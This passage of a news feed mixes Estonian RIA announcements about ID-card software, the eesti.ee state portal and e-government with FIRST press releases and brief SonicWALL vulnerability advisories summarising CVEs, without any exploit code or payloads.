Riigikogu kinnitas 23. veebruaril eelnõu, millega muutub Riigi Infosüsteemide Arenduskeskus (RIA) alates 1. juunist 2011 ametiks. Uus Riigi Infosüsteemi Amet pakub turvalisuse tagamisel abi era- ja riigisektori infosüsteemide omanikele ning saab õiguse teha järelevalvet.

https://ria.ee/uudised/1-juunist-luuakse-riigi-infosusteemi-amet
Selgusid parimad e-teenused
2011-02-21T22:00:00Z | 1298325600

Majandus- ja Kommunikatsiooniministeerium ja Riigi Infosüsteemide Arenduskeskuse korraldatud konkursil selgusid Eesti parimad e-teenused. Ühtekokku osales konkursil 71 uut kodumaist e-lahendust. Edasi liiguvad võitjad rahvusvahelisele konkursile Word Summit Award.

https://ria.ee/uudised/selgusid-parimad-e-teenused
Valmis uus ID-kaardi tarkvara Windowsile
2011-01-19T22:00:00Z | 1295474400

Alates tänasest on aadressilt installer.id.ee võimalik alla laadida uut ID-kaardi tarkvara Windowsile. Samalt aadressilt leiab eelmise aasta lõpus valminud tarkvara Macile ja Linuxile.

https://ria.ee/uudised/valmis-uus-id-kaardi-tarkvara-windowsile
Luuakse Riigi Infosüsteemi Amet
2011-01-12T22:00:00Z | 1294869600

Valitsus kinnitas täna eelnõu, millega muutub Riigi Infosüsteemide Arenduskeskus alates 1. juunist 2011 ametiks. Uus Riigi Infosüsteemi Amet laiendab infosüsteemide turvalisusega tegelevaid valdkondi ja saab juurde järelevalve osakonna.

https://ria.ee/uudised/luuakse-riigi-infosusteemi-amet
Eesti parimad e-teenused saavad veebikleebise
2010-11-28T22:00:00Z | 1290981600

Eesti parima e-teenuse konkursi võitjad saavad esmakordselt koduleheküljele veebikleebise, mille järgi tunneb internetikasutaja ära tiitlivõidu noppinud e-lahendused.

https://ria.ee/uudised/eesti-parimad-e-teenused-saavad-veebikleebise
Eesti valib parimad e-teenused
2010-11-07T22:00:00Z | 1289167200

Täna algab Majandus- ja Kommunikatsiooniministeeriumi (MKM) ning Riigi Infosüsteemide Arenduskeskuse (RIA) konkurss Eesti parimate e-teenuste leidmiseks. Tegemist on ühtlasi rahvusvahelise e-lahenduste konkursi World Summit Award (WSA) 2011 Eesti eelvooruga.

https://ria.ee/uudised/eesti-valib-parimad-e-teenused
SonicWALL SSL-VPN E-Class ActiveX Control Multiple Buffer Overflow Vulnerabilities
2010-11-03T13:37:00Z | 1288791420

Stack-based buffer overflow in SonicWALL SSL-VPN End-Point Interrogator/Installer ActiveX control (Aventail.EPInstaller) before 10.5.2 and 10.0.5 hotfix 3 allows remote attackers to execute arbitrary code via long (1) CabURL and (2) Location arguments to the Install3rdPartyComponent method. CVE: CVE-2010-2583 Last updated: Aug. 17, 2017, 1:32 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2010-0001
November on hea e-teenuse tunnustamise kuu
2010-10-31T22:00:00Z | 1288562400

Majandus- ja Kommunikatsiooniministeerium ning Riigi Infosüsteemide Arenduskeskus nimetavad novembri hea e-teenuse kuuks ja kutsuvad märkama ja tunnustama igapäevaelu lihtsustavaid e-lahendusi.

https://ria.ee/uudised/november-hea-e-teenuse-tunnustamise-kuu
Valmis ID-kaardi tarkvara Macile ja Linuxile
2010-10-31T22:00:00Z | 1288562400

Eelmisel reedel andis AS Sertifitseerimiskeskus Riigi Infosüsteemide Arenduskeskusele üle ID-kaardi baastarkvara Linuxile ja Macile. Tarkvara abil saavad kasutajad end elektroonilistes keskkondades autentida ja allkirjastada enda arvutis dokumente.

https://ria.ee/uudised/valmis-id-kaardi-tarkvara-macile-ja-linuxile
ID-kaardi tarkvara beetaversioon
2010-09-30T21:00:00Z | 1285880400

RIA palub kõigi teadlike arvutikasutajate abi, et testida ID-kaardi baastarkvara Macile ja Linuxile.

https://ria.ee/uudised/id-kaardi-tarkvara-beetaversioon
IT kolledž alustab küberkaitse spetsialistide ettevalmistamist
2010-09-22T21:00:00Z | 1285189200

Eesti Infotehnoloogia Kolledžis (EIK) luuakse Euroopa Struktuurifondide toetusel kursus küberkaitse alaseks väljaõppeks. Esimesed huvilised saavad registreeruda novembris alustavatesse gruppidesse.

https://ria.ee/uudised/it-kolledz-alustab-kuberkaitse-spetsialistide-ettevalmistamist
Riik hakkab analüüsima e-demokraatia olukorda
2010-09-22T21:00:00Z | 1285189200

Majandus- ja Kommunikatsiooniministeerium (MKM) ja Riigi Infosüsteemide Arenduskeskus (RIA) hakkavad koostöös e-Riigi Akadeemiaga analüüsima Eesti e-demokraatia ja e-kaasamise olukorda.

https://ria.ee/uudised/riik-hakkab-analuusima-e-demokraatia-olukorda
Eesti.ee pakub Euroopa ettevõtjatele uuenenud keskkonda
2010-08-24T21:00:00Z | 1282683600

Riigiportaal eesti.ee pakub augustist Euroopa Liidu ettevõtjatele inglise keeles varasemast mahukamat ja sisukamat keskkonda.

https://ria.ee/uudised/eestiee-pakub-euroopa-ettevotjatele-uuenenud-keskkonda
ID-kaardi tarkvara arendab AS Sertifitseerimiskeskus
2010-07-26T21:00:00Z | 1280178000

23. juulil sõlmisid Riigi Infosüsteemide Arenduskeskus (RIA) ja AS Sertifitseerimiskeskus (SK) lepingu, mille järgi jätkab ID-kaardi tarkvara arendamist Sertifitseerimiskeskus.

https://ria.ee/uudised/id-kaardi-tarkvara-arendab-sertifitseerimiskeskus
RIA ja Smartlink jõudsid kohtus kokkuleppele
2010-07-26T21:00:00Z | 1280178000

23. juulil sõlmisid Riigi Infosüsteemide Arenduskeskus ja OÜ Smartlink kohtuliku kompromissi ID-kaardi tarkvara arendamislepingu lõpetamise kohtuasjas

https://ria.ee/uudised/ria-ja-smartlink-joudsid-kohtus-kokkuleppele
Eesti elanikud on e-teenustega rahul
2010-05-10T21:00:00Z | 1273525200

Euroopa Liidu infoühiskonna teadlikkuse tõstmise programmi raames tellitud uuringust selgub, et 75 protsenti kõigist e-teenuseid kasutanud Eesti elanikest on nendega väga rahul.

https://ria.ee/uudised/eesti-elanikud-e-teenustega-rahul
Eesti sõlmis NATO-ga küberkaitsealase leppe
2010-04-23T21:00:00Z | 1272056400

23. aprillil sõlmisid Eesti ja NATO esindajad küberkaitsealase vastastikuse mõistmise memorandumi.

https://ria.ee/uudised/eesti-solmis-nato-ga-kuberkaitsealase-leppe
International Workshop Endorses Principles of Security Incident Response for Africa
2010-03-19T19:03:00Z | 1269025380

FIRST and ICANN held a four-day joint cyber-security workshop for African incident response teams in conjunction with the 37th ICANN meeting in Nairobi, Kenya during March 5-8, 2010.

http://www.prweb.com/releases/2010/03/prweb3695284.htm
eArvekeskus alustas DVK kaudu e-arvete edastamist
2010-01-18T22:00:00Z | 1263852000

Aasta alguses alustas Eesti Posti eArvekeskus avalikule sektorile dokumendivahetuskeskuse (DVK) kaudu e-arvete edastamist.

https://ria.ee/uudised/earvekeskus-alustas-dvk-kaudu-e-arvete-edastamist
Valmis ISKE auditeerimist täpsustav juhend
2010-01-17T22:00:00Z | 1263765600

Riigi Infosüsteemide Arenduskeskusel on valminud ISKE auditi juhend, mis annab täpsemaid juhiseid ISKE auditite läbiviimiseks.

https://ria.ee/uudised/valmis-iske-auditeerimist-tapsustav-juhend
Tanel Padar ja Ivo Linna kutsuvad riigiportaali avastama
2010-01-06T22:00:00Z | 1262815200

Sel nädalal algab riigiportaali eesti.ee tutvustav ringreis Eesti maakondades. Kontsertprogrammiga ringreis viib eesti.ee esmakordselt linnadesse väljaspool Tallinna ning kutsub inimesi portaaliga tutvust tegema. Riigiportaali tutvustatakse kaheksas linnas, avaüritused on sel reedel Jõhvis ja laupäeval Paides.

https://ria.ee/uudised/tanel-padar-ja-ivo-linna-kutsuvad-riigiportaali-avastama
Algas riigiportaali teavituskampaania
2009-12-28T22:00:00Z | 1262037600

Sel nädalal algas ulatuslik teavituskampaania, mis viib riigiportaali esmakordselt linnadesse väljaspool Tallinna ning kutsub inimesi portaaliga tuvust tegema.

https://ria.ee/uudised/algas-riigiportaali-teavituskampaania
Multiple Vendor Clientless SSL VPN Products Same Origin Policy Bypass Vulnerability
2009-12-04T11:30:00Z | 1259926200

Multiple clientless SSL VPN products that run in web browsers, including Stonesoft StoneGate; Cisco ASA; SonicWALL E-Class SSL VPN and SonicWALL SSL VPN; SafeNet SecureWire Access Gateway; Juniper Networks Secure Access; Nortel CallPilot; Citrix Access Gateway; and other products, when running in configurations that do not restrict access to the same domain as the VPN, retrieve the content of remote URLs from one domain and rewrite them so they originate from the VPN's domain, which violates the same origin policy and allows remote attackers to conduct cross-site scripting attacks, read cookies that originated from other domains, access the Web VPN session to gain access to internal resources, perform key logging, and conduct other attacks. NOTE: it could be argued that this is a fundamental design problem in any clientless VPN solution, as opposed to a commonly-introduced error that can be fixed in separate implementations. Therefore a single CVE has been assigned for all products that have this design. CVE: CVE-2009-2631 Last updated: Aug. 17, 2017, 1:30 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2009-0001
Liidrid võtavad infoühiskonna pihtide vahele
2009-11-24T22:00:00Z | 1259100000

26. ja 27. novembril toimuvad Sagadi mõisas esimesed kõrgemad infoühiskonna kursused, mille eesmärk on tutvustada infoühiskonna võimalusi. Kursustest võtab osa ligi 50 avaliku- ja erasektori juhti, teadlast ning valdkonnaeksperti.

https://ria.ee/uudised/liidrid-votavad-infouhiskonna-pihtide-vahele
Eesti paberivaba asjaajamine tuuakse Euroopale eeskujuks
2009-11-19T22:00:00Z | 1258668000

Eesti üleminek paberivabale asjaajamisele pälvis Euroopa e-valitsemise parima praktika projekti tiitli.

https://ria.ee/uudised/eesti-paberivaba-asjaajamine-tuuakse-euroopale-eeskujuks
Arvutimängud pakuvad lahendust küberkiusamisele
2009-11-12T22:00:00Z | 1258063200

Kui Euroopas puutub uuringute andmetel küberkiusamisega kokku pea iga kümnes 6–8-aastane laps, siis Eestis esineb küberkiusamist kordades rohkem ning üha sagedamini just nooremas eagrupis.

https://ria.ee/uudised/arvutimangud-pakuvad-lahendust-kuberkiusamisele
European eGovernment Awards Good Practice 2009
2009-11-02T22:00:00Z | 1257199200

Dokumendivahetuskeskus (DVK) jõudis konkursil European eGovernment Awards Good Practice 2009 parimate projektide hulka. Kategoorias "E-riik efektiivsuse toetajana" oli DVK ainus Eesti projekt, millele anti hea tava märk.

https://ria.ee/uudised/european-egovernment-awards-good-practice-2009
Emad-isad - õpetage lapsele e-enesekaitset!
2009-10-20T21:00:00Z | 1256072400

26. oktoobril alustab RIA teavitust lapsevanematele, kutsudes emasid ja isasid huvituma lapse tegemistest Internetis ning rääkima lapsega turvalisest veebikasutusest.

https://ria.ee/uudised/emad-isad-opetage-lapsele-e-enesekaitset
Uue ID-kaardi tarkvaraga Linuxil ja Macil rohkem võimalusi
2009-10-11T21:00:00Z | 1255294800

Linuxi ja Maci omanikud saavad uue ID-kaardi tarkvara avaliku testversiooniga veebilehtedele sisse logida, dokumente allkirjastada ja ID-kaardi PIN-koode muuta.

https://ria.ee/uudised/uue-id-kaardi-tarkvaraga-linuxil-ja-macil-rohkem-voimalusi
RIA loob elutähtsate infosüsteemide kaitse üksuse
2009-09-29T21:00:00Z | 1254258000

1. oktoobril alustab RIAs tööd kriitilise informatsiooni infrastruktuuri kaitse osakond (KIIK). Osakonna ülesanne on Eesti kriitilise informatsiooni infrastruktuuri kaitse süsteemi loomine ja selle käigus hoidmine.

https://ria.ee/uudised/ria-loob-elutahtsate-infosusteemide-kaitse-uksuse
Riigiportaal eesti.ee uueneb
2009-08-17T21:00:00Z | 1250542800

Augustis algab riigiportaal eesti.ee uuenduskuur, mille käigus muutub riigiportaal oluliselt kasutajasõbralikumaks ja ilusamaks.

https://ria.ee/uudised/riigiportaal-eestiee-uueneb
Chinese Security Company Shares Huge Malware Database
2009-07-03T20:54:00Z | 1246654440

A Chinese company that has created a massive database of malware found on Chinese Web sites opened up the information to other security organizations on Thursday.

https://www.first.org/newsroom/releases/20090703a.html
Global IT Failure Could Cost More than Kobe Quake, FIRST Experts Warned
2009-07-03T20:30:00Z | 1246653000

Sabotage or failure on just one computer system could bring down the world information network in a disaster inflicting more damage than the Kobe earthquake, security experts learned today at their annual conference. They also heard how vulnerable the IT infrastructure is - and how thwarted attacks on the Beijing Olympics showed the determination of cyber criminals.

https://www.first.org/newsroom/releases/20090703.html
INTERPOL and FIRST join Hands to Fight Cyber Crime
2009-06-30T20:19:00Z | 1246393140

A law enforcement loophole through which cyber criminals have been escaping started to close today as international police and the world's leading forum of online security experts forged a new alliance.

https://www.first.org/newsroom/releases/20090630a.html
Executive games could help stem cybercrime, FIRST experts told
2009-06-30T01:27:00Z | 1246325220

Update from FIRST Annual Conference Kyoto - Dr Suguru Yamaguchi, member and adviser on information security at the Japanese Cabinet Office National Information Security Centre, gave the opening keynote address. For complete press release see http://www.first.org/newsroom/releases/20090630.html.

https://www.first.org/newsroom/releases/20090630.html
Algab koolituste ja infopäevade sari – Tark e-riik
2009-06-15T21:00:00Z | 1245099600

Tänasest on avatud registreerumine riigi infosüsteemi võimalusi tutvustavate koolitustele ja infopäevadele. Esimesed üritused toimuvad juuli alguses – 1. juulil toimub infopäev arendusprotsessi parimatest praktikatest avalikus sektoris ning 2. juulil koolitus infosüsteemide turvameetmete süsteemi rakendamisest. Kokku on aasta lõpuks kavas läbi viia 27 koolitust ning infopäeva.

https://ria.ee/uudised/algab-koolituste-ja-infopaevade-sari-tark-e-riik
Prepare for Insider Onslaught, FIRST Warns Business, Government
2009-05-21T15:15:00Z | 1242918900

FIRST, one of the world's leading Internet security organizations today, warned businesses and governments to prepare for a surge in sabotage, thefts and other cyber-attacks by insiders as disaffected employees retaliate in the wake of the global depression.

http://www.prweb.com/releases/2009/05/prweb2439744.htm
Lapsevanemad saavad vaadata, kuidas internetis last kaitsta
2009-03-16T22:00:00Z | 1237240800

Alates sellest nädalast on võimalik lehel lapsnetis.eesti.ee vaadata Kalev Pihli loengut, mis räägib lapsi internetis varistsevatest ohtudest ning lapsevanema võimalustest oma last võrgus liiklemisel aidata.

https://ria.ee/uudised/lapsevanemad-saavad-vaadata-kuidas-internetis-last-kaitsta
Riigiportaali eesti.ee peetakse kasulikuks, kuid keeruliseks
2009-03-03T22:00:00Z | 1236117600

Riigiportaali külastatavus on kahe kuuga kasvanud kaks korda – kui eelmise aasta kahel viimasel kuul käis portaalis 121 500 inimest, siis jaanuaris-veebruaris oli kasutajaid juba üle 233 tuhande. Tagasiside näitab, et tulevikult oodatakse portaali muutumist isiklikumaks, lihtsamaks ja päevakajalisemaks.

https://ria.ee/uudised/riigiportaali-eestiee-peetakse-kasulikuks-kuid-keeruliseks
Next World Cyber-security Contest Launched by FIRST, CERT Coordination Center
2009-02-25T13:55:00Z | 1235570100

Pittsburgh, PA, February, 25 2009 - The second international competition honoring best practices and advances in safeguarding the security of computer systems and networks was announced today by FIRST (the Forum of Incident Response and Security Teams) and the Carnegie Mellon Software Engineering Institute CERT Coordination Center (CERT/CC).

https://www.first.org/newsroom/releases/20090225.html
Tulumaksu deklareerimisel saab kinnistusandmed www.eesti.ee portaalist
2009-02-15T22:00:00Z | 1234735200

Eilsest saab e-maksuametis esitada eelmise aasta tulude deklaratsioone, kus on tänavu oluline muudatus – kodulaenu võtnud inimestel tuleb sisestada oma kinnistu number. Kinnistu numbrit saavad kodulaenu võtnud inimesed vaadata riigiportaalist www.eesti.ee.

https://ria.ee/uudised/tulumaksu-deklareerimisel-saab-kinnistusandmed-wwweestiee-portaalist
ID-kaardi tarkvara testimiseks
2009-02-10T22:00:00Z | 1234303200

RIA on ID-kaardi ja digitaalallkirja baastarkvara arendamisel jõudnud etapini, kus teadlikumatel arvutikasutajatel on võimalus oma sõna sekka öelda ning testida, mida seni tehtud on.

https://ria.ee/uudised/id-kaardi-tarkvara-testimiseks
Riigiportaal eesti.ee ootab portaaliga tutvuma ja arvamust avaldama
2009-01-12T22:00:00Z | 1231797600

Tänasest algav teavituskampaania „Eesti.ee- uks e-riiki“ kutsub inimesi portaaliga eesti.ee tutvuma. Korraldajad ootavad küsitluse kaudu tagasisidet portaali hetkeseisust, ootustest tulevikule ning e-teenuste kasutamisest laiemalt. Ühtlasi luuakse huvilistest riigiportaali arendustiim, kellel on ka tulevikus võimalik portaali arendamiseks ettepanekuid teha.

https://ria.ee/uudised/riigiportaal-eestiee-ootab-portaaliga-tutvuma-ja-arvamust-avaldama
FIRST gets record sponsor list for Kyoto Conference
2009-01-06T18:36:00Z | 1231266960

The world’s economic woes haven’t stopped unprecedented levels of sponsorship being pledged for the 21st Annual Conference of FIRST with six months still to go before proceedings open on June 28, 2009, in Kyoto.

https://www.first.org/newsroom/releases/20090106.html
Murrame müüte ID-kaardi kohta
2008-11-18T22:00:00Z | 1227045600

Tänasest algab ID-kaardi kampaania, mille eesmärk on teada anda kaardi elektroonilistest kasutusvõimalustest. Kampaania lehe leiab aadressilt www.id.ee/id.

https://ria.ee/uudised/murrame-muute-id-kaardi-kohta
SonicWALL Content Filtering Blocked Site Error Page Cross-Site Scripting Vulnerability
2008-11-04T21:00:00Z | 1225832400

Cross-site scripting (XSS) vulnerability in SonicWALL SonicOS Enhanced before 4.0.1.1, as used in SonicWALL Pro 2040 and TZ 180 and 190, allows remote attackers to inject arbitrary web script or HTML into arbitrary web sites via a URL to a site that is blocked based on content filtering, which is not properly handled in the CFS block page, aka "universal website hijacking.""" CVE: CVE-2008-4918 Last updated: Aug. 8, 2017, 1:32 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2008-0002
AssaPauk – kampaania turvalisest käitumisest Internetis
2008-09-18T21:00:00Z | 1221771600

Täna algas teavituskampaania, mis annab soovitusi, kuidas Internetis turvaliselt ringi talitada. Kõik materjalid leiab lehelt netiohud.ee/assapauk.

https://ria.ee/uudised/assapauk-kampaania-turvalisest-kaitumisest-internetis
CERT Eesti eksperdid jõudsid tagasi
2008-08-17T21:00:00Z | 1219006800

Nädalavahetusel jõudsid Eestisse tagasi kaks CERT Eesti spetsialisti, kes aitasid Gruusia kolleege infoturbe alastes küsimustes.

https://ria.ee/uudised/cert-eesti-eksperdid-joudsid-tagasi
Info küberrünnete kohta Gruusias viibivatelt CERT Eesti spetsialistidelt.
2008-08-13T21:00:00Z | 1218661200

Hetkel toimib Internet suhteliselt hästi, mobiilivõrk on veidi ebastabiilsem. Enamus rünnakute all olevaid kodulehti on ajutiselt kolitud erinevatesse paikadesse üle maailma.

https://ria.ee/uudised/info-kuberrunnete-kohta-gruusias-viibivatelt-cert-eesti-spetsialistidelt
Eesti aitab Gruusiat küberrünnete tõrjumisel
2008-08-11T21:00:00Z | 1218488400

Abistamaks Gruusiat küberrünnete tõrjumisel, pakkus Eesti humanitaarabi andmise raames abi ühe Gruusia kodulehe majutamiseks. Hetkel aitab Eesti majutada Gruusia Välisministeeriumi kodulehe serverit, mis näitab lehte mfa.gov.ge.

https://ria.ee/uudised/eesti-aitab-gruusiat-kuberrunnete-torjumisel
Riik.ee ühineb riigiportaaliga eesti.ee
2008-07-10T21:00:00Z | 1215723600

Täna õhtul suunatakse portaal www.riik.ee ümber riigiportaalile www.eesti.ee, mis on info- ja teenusteruum Internetis nii kodanikele, ettevõtjatele kui riigiametnikele.

https://ria.ee/uudised/riikee-uhineb-riigiportaaliga-eestiee
Rekord püstitatud!
2008-06-30T21:00:00Z | 1214859600

Eile lõppes ID-kaardi elektrooniliste kasutusvõimaluste kampaania, mille eesmärk oli ühele dokumendile saada võimalikult palju digitaalseid allkirju. Rekordiürituses osales üle 11 000 inimese.

https://ria.ee/uudised/rekord-pustitatud
FIRST to learn know-how from Japan's recoveries
2008-06-27T16:33:00Z | 1214584380

The lessons Japan can teach the world about disaster recovery will be a top theme for delegates from FIRST, the Forum of Incident Response and Security Teams, when they meet for their 21st annual conference in Kyoto next year.

https://www.first.org/newsroom/releases/20080627.html
FIRST, CERT Coordination Centre launch free 'net protection
2008-06-27T06:44:00Z | 1214549040

New methods that organisations and individuals can adopt for free to protect themselves from malicious Internet attacks were unveiled today at the 20th annual conference of FIRST, the Forum of Internet Response and Security Teams.

https://www.first.org/newsroom/releases/20080626_1.html
FIRST told of Chinese PC hijack explosion
2008-06-27T06:23:00Z | 1214547780

The number of innocent individuals in China whose personal computers were hijacked by criminals rose by a staggering 2125 per cent between 2006 and 2007, delegates were told here today at the 20th annual conference of FIRST, the Forum of Incident Response and Security Teams.

https://www.first.org/newsroom/releases/20080626.html
FIRST moves to bring cyber crime fighters together
2008-06-25T21:53:00Z | 1214430780

A new initiative to ease tensions between law enforcers and internet security experts was launched here today at the 20th annual conference of FIRST, the Forum of Incident Response and Security Teams.

https://www.first.org/newsroom/releases/20080625_1.html
President Ilves toetab teavitamist ID-kaardi võimalustest
2008-06-25T21:00:00Z | 1214427600

Täna andis president Toomas Hendrik Ilves allkirja toetamaks ID-kaardi elektroonilisi kasutusvõimalusi tutvustavat kampaaniat. Teavituskampaania käigus püüeldakse digiallkirjastamise maailmarekordi poole.

https://ria.ee/uudised/president-ilves-toetab-teavitamist-id-kaardi-voimalustest
Kõik saavad maailmarekordit toetada
2008-05-28T21:00:00Z | 1212008400

Alates tänasest on kõikidel soovijatel võimalik panna õlg alla digitaalallkirja maailmarekordi sooritamisele. RIA avas kampaania lehel www.id.ee alamlehe, kus on üleval kõik kampaania reklaammaterjalid.

https://ria.ee/uudised/koik-saavad-maailmarekordit-toetada
RIHA ootab kasutajaid
2008-05-28T21:00:00Z | 1212008400

Riigi infosüsteemi halduse infosüsteem (RIHA) on kasutajatele avatud ja ootab andmekogude andmete uuendamist. RIHA on kättesaadav aadressilt riha.eesti.ee/riha

https://ria.ee/uudised/riha-ootab-kasutajaid
Tehnik aitab seadistada ID-kaarti
2008-05-28T21:00:00Z | 1212008400

Sul on ID-kaart ja kaardilugeja olemas, aga tarkvara on paigaldamata ja kasutama pole ID-kaarti veel hakanud? Või on küll kõik vajalik olemas, aga sellest hoolimata ei õnnestu ID-kaardiga internetis toimetada?

https://ria.ee/uudised/tehnik-aitab-seadistada-id-kaarti
Algab üleriigiline ID-kaardi kampaania
2008-05-18T21:00:00Z | 1211144400

22. mail algab üleriigiline ID-kaardi teavituskampaania, mille käigus sünnib uus maailmarekord: saada ühele dokumendile võimalikult palju digitaalseid allkirju.

https://ria.ee/uudised/algab-uleriigiline-id-kaardi-kampaania
KülaTee3 aitas maapiirkonnad Internetiga ühendada
2008-05-14T21:00:00Z | 1210798800

Riigi Infosüsteemide Arenduskeskus (RIA) kuulutas edukalt lõpetatuks programmi KülaTee3, mille eesmärk oli viia Interneti püsiühenduse võimalus Eesti maapiirkondadesse, kus erasektoril varasemalt teenuse pakkumise huvi puudus.

https://ria.ee/uudised/kulatee3-aitas-maapiirkonnad-internetiga-uhendada
Riigiportaal eesti.ee vastab WCAG tasemele A
2008-05-14T21:00:00Z | 1210798800

Riigi Infosüsteemide Arenduskeskus tellis 2007. aasta lõpus riigiportaali eesti.ee veebilehe käideldavuse analüüsi. Selle viis läbi Valdo Praust, analüüsi aluseks oli W3C konsortsiumi käideldavuse hindamise metoodika WCAG.

https://ria.ee/uudised/riigiportaal-eestiee-vastab-wcag-tasemele
SonicWALL Email Security Error Page Cross-Site Scripting Vulnerability
2008-05-12T22:20:00Z | 1210630800

Cross-site scripting (XSS) vulnerability in SonicWall Email Security 6.1.1 allows remote attackers to inject arbitrary web script or HTML via the Host header in a request to a non-existent web page, which is not properly sanitized in an error page. CVE: CVE-2008-2162 Last updated: Aug. 8, 2017, 1:30 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2008-0001
Algab teavituskampaania turvalisest arvutikasutusest
2008-02-10T22:00:00Z | 1202680800

12. veebruaril tähistab Eesti 50 maailma riigi seas turvalise Interneti päeva. Sel päeval meenutatakse arvutikasutajatele, et turvaliseks liiklemiseks Internetis on vaja end järjest hoolikamalt kaitsta.

https://ria.ee/uudised/algab-teavituskampaania-turvalisest-arvutikasutusest
Netitester mõõdab internetiühenduse kiirust
2008-01-23T22:00:00Z | 1201125600

Riigi Infosüsteemide Arenduskeskus lõi veebilehe www.netitester.ee, mis aitab nii kodukasutajal kui tehnikul mõõta internetiühenduse kiirust kõikides Eesti internetivõrkudes.

https://ria.ee/uudised/netitester-moodab-internetiuhenduse-kiirust
Riigi andmekogud seotakse ühtselt toimivaks
2008-01-13T22:00:00Z | 1200261600

1. jaanuarist muutunud avaliku teabe seaduse eesmärk on kaardistada kõik avalikus sektoris olevad andmekogud ja tõhustada koostööd. See esitab aga riigiasutustele ja kohalikele omavalitsustele uued nõudmised.

https://ria.ee/uudised/riigi-andmekogud-seotakse-uhtselt-toimivaks
ISKE aitab andmeid turvaliselt hoida
2008-01-01T22:00:00Z | 1199224800

Alates käesoleva aasta algusest kehtib kõigile riigi ja kohaliku omavalitsuse andmekogudele üks turvameetmete süsteem – ISKE.

https://ria.ee/uudised/iske-aitab-andmeid-turvaliselt-hoida
Rahvastikuregistrisse saab nüüdsest esitada avaldusi elektrooniliselt
2007-12-13T22:00:00Z | 1197583200

Siseministeerium ja Riigi Infosüsteemide Arenduskeskus (RIA) avasid riigiportaalis www.eesti.ee mitmed uued teenused, mis võimaldavad inimestel sooritada kiiremini ja mugavamalt perekonnasündmuste ja elukoha registreerimist internetis.

https://ria.ee/uudised/rahvastikuregistrisse-saab-nuudsest-esitada-avaldusi-elektrooniliselt
SonicWALL Global VPN Client Remote Format String Vulnerability
2007-12-07T11:46:00Z | 1197027960

Multiple format string vulnerabilities in the configuration file in SonicWALL GLobal VPN Client 3.1.556 and 4.0.0.810 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in the (1) Hostname tag or the (2) name attribute in the Connection tag. NOTE: there might not be any realistic circumstances in which this issue crosses privilege boundaries. CVE: CVE-2007-6273 Last updated: March 8, 2011, 3:02 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2007-0004
KülaTee3 jätkab maakohtade internetiseerimist
2007-11-14T22:00:00Z | 1195077600

Riigi Infosüsteemide Arenduskeskus kuulutas novembri alguses programmi KülaTee3 raames välja jätkuhanked neljas maakonnas, kus on vaja täiendada interneti püsiühenduse kättesaadavust.

https://ria.ee/uudised/kulatee3-jatkab-maakohtade-internetiseerimist
SonicWALL SSL VPN Client Remote ActiveX Multiple Vulnerabilities
2007-11-05T18:46:00Z | 1194288360

Absolute path traversal vulnerability in the WebCacheCleaner ActiveX control 1.3.0.3 in SonicWall SSL-VPN 200 before 2.1, and SSL-VPN 2000/4000 before 2.5, allows remote attackers to delete arbitrary files via a full pathname in the argument to the FileDelete method. CVE: CVE-2007-5815 Last updated: July 29, 2017, 1:33 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2007-0003
SonicWALL SSL VPN Client Remote ActiveX Multiple Vulnerabilities
2007-11-05T18:46:00Z | 1194288360

Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allow remote attackers to execute arbitrary code via a long (1) serverAddress, (2) sessionId, (3) clientIPLower, (4) clientIPHigher, (5) userName, (6) domainName, or (7) dnsSuffix Unicode property value. NOTE: the AddRouteEntry vector is covered by CVE-2007-5603. CVE: CVE-2007-5814 Last updated: July 29, 2017, 1:33 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2007-0002
SonicWALL SSL VPN Client Remote ActiveX Multiple Vulnerabilities
2007-11-05T18:46:00Z | 1194288360

Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method. CVE: CVE-2007-5603 Last updated: Sept. 29, 2017, 1:29 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2007-0001
Senised Teabeportaal ja Kodanikuportaal moodustavad riigiportaali „eesti.ee“
2007-10-14T21:00:00Z | 1192395600

Riigiportaal „eesti.ee“ koondab senise Teabeportaali ning Kodanikuportaali üheks tervikuks. Portaal lähtub kasutajast, seetõttu on kodanikule, ettevõtjale ning ametnikule suunatud info ning teenused eraldatud.

https://ria.ee/uudised/senised-teabeportaal-ja-kodanikuportaal-moodustavad-riigiportaali-eestiee
Riik plaanib muuta avaliku sektori asjajamise paberivabaks
2007-10-03T21:00:00Z | 1191445200

Valitsus kiitis neljapäeval heaks riigisekretär Heiki Loodi esitatud määruse eelnõu, mille kohaselt peaks avaliku sektori asjaajamine muutuma 2011. aastaks paberivabaks.

https://ria.ee/uudised/riik-plaanib-muuta-avaliku-sektori-asjajamise-paberivabaks
Eesti e-lahendused konkureerivad Euroopa parimatega
2007-09-13T21:00:00Z | 1189717200

Äriregistri Ettevõtjaportaal ning e-hääletamine jõudsid finalistide hulka konkursil "European eGovernment Awards 2007". Euroopa Komisjon selgitab välja parimad e-lahendused neljas kategoorias – paremad avalikud teenused, osalusdemokraatia, sotsiaalne mõju ning tõhus avalik sektor.

https://ria.ee/uudised/eesti-e-lahendused-konkureerivad-euroopa-parimatega
Valitsuskabinet kiitis heaks küberrünnetevastase tegevuskava
2007-07-05T21:00:00Z | 1183669200

Majandus- ja Kommunikatsiooniministeerium esitas valitsuskabinetile kinnitamiseks küberrünnakutevastase tegevuskava, mille kabinet 05. juuli istungil heaks kiitis. „Tegu on vahejoonega, mis võtab kokku juhtunu ja loob suunad järgmise aasta tegevusteks,” nentis majandus- ja kommunikatsiooniminister Juhan Parts.

https://ria.ee/uudised/valitsuskabinet-kiitis-heaks-kuberrunnetevastase-tegevuskava
Lääne-Viru maavalitsus asub ISKE-t juurutama
2007-06-26T21:00:00Z | 1182891600

AS Siemens alustab ISKE juurutamist Lääne-Viru Maavalitsuses eesmärgiga lihtsustada maavalitsuste tasemel infosüsteemide kolmeastmelise etalonturbe süsteemi rakendamist.

